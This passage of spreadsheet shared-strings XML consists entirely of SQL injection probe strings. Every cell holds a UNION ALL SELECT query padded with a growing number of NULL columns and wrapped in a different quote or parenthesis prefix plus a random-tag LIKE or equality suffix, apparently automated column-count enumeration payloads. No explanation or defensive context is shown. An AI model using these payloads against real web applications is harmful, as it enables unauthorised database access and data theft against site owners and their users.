    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ssSg' LIKE 'ssSg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'EbBP' LIKE 'EbBP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'UStt' LIKE 'UStt</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'OaWZ' LIKE 'OaWZ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'eWlE' LIKE 'eWlE</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'LYjL' LIKE 'LYjL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'zEqS' LIKE 'zEqS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'EhCu' LIKE 'EhCu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'sRxH' LIKE 'sRxH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'iSjA' LIKE 'iSjA</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'DZil' LIKE 'DZil</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ojsI' LIKE 'ojsI</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ADUT' LIKE 'ADUT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'qAQX' LIKE 'qAQX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Cgyr' LIKE 'Cgyr</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'KMWx' LIKE 'KMWx</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'wBgR' LIKE 'wBgR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'YBil' LIKE 'YBil</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'RYJF' LIKE 'RYJF</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xkrI' LIKE 'xkrI</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'LKSu' LIKE 'LKSu</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hcRF' LIKE 'hcRF</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'CIhP' LIKE 'CIhP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'LBrf' LIKE 'LBrf</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'YRTC' LIKE 'YRTC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "xVEj" = "xVEj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "GcpC" = "GcpC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "yzGk" = "yzGk</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "QIoE" = "QIoE</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "HXjh" = "HXjh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "vAit" = "vAit</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "nkTK" = "nkTK</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ukJN" = "ukJN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Ywms" = "Ywms</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "JjGL" = "JjGL</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "RNIg" = "RNIg</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "znoU" = "znoU</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "PeHl" = "PeHl</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "koMA" = "koMA</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "nKIF" = "nKIF</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Qrio" = "Qrio</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "yaAJ" = "yaAJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "WpiH" = "WpiH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "vgdj" = "vgdj</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "ODGZ" = "ODGZ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "IKdJ" = "IKdJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "SMJZ" = "SMJZ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "IsYb" = "IsYb</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "NBSv" = "NBSv</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "oRfE" = "oRfE</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "gCGe" = "gCGe</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "HiWA" = "HiWA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "mSbk" = "mSbk</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "STHh" = "STHh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "huVg" = "huVg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "KZix" = "KZix</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "iSAk" = "iSAk</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ZDzI" = "ZDzI</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "WZXA" = "WZXA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "gtUy" = "gtUy</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "JGDs" = "JGDs</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "TFpX" = "TFpX</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "EmkE" = "EmkE</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "DTsz" = "DTsz</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "udGc" = "udGc</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ObFE" LIKE "ObFE</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "vsOl" LIKE "vsOl</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "JYPv" LIKE "JYPv</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ZhSt" LIKE "ZhSt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Ucoy" LIKE "Ucoy</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "bYCk" LIKE "bYCk</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "lgbC" LIKE "lgbC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "jXcc" LIKE "jXcc</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "FsfX" LIKE "FsfX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "JOqi" LIKE "JOqi</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "cnhH" LIKE "cnhH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "AlYD" LIKE "AlYD</t>
  </si>
  <si>
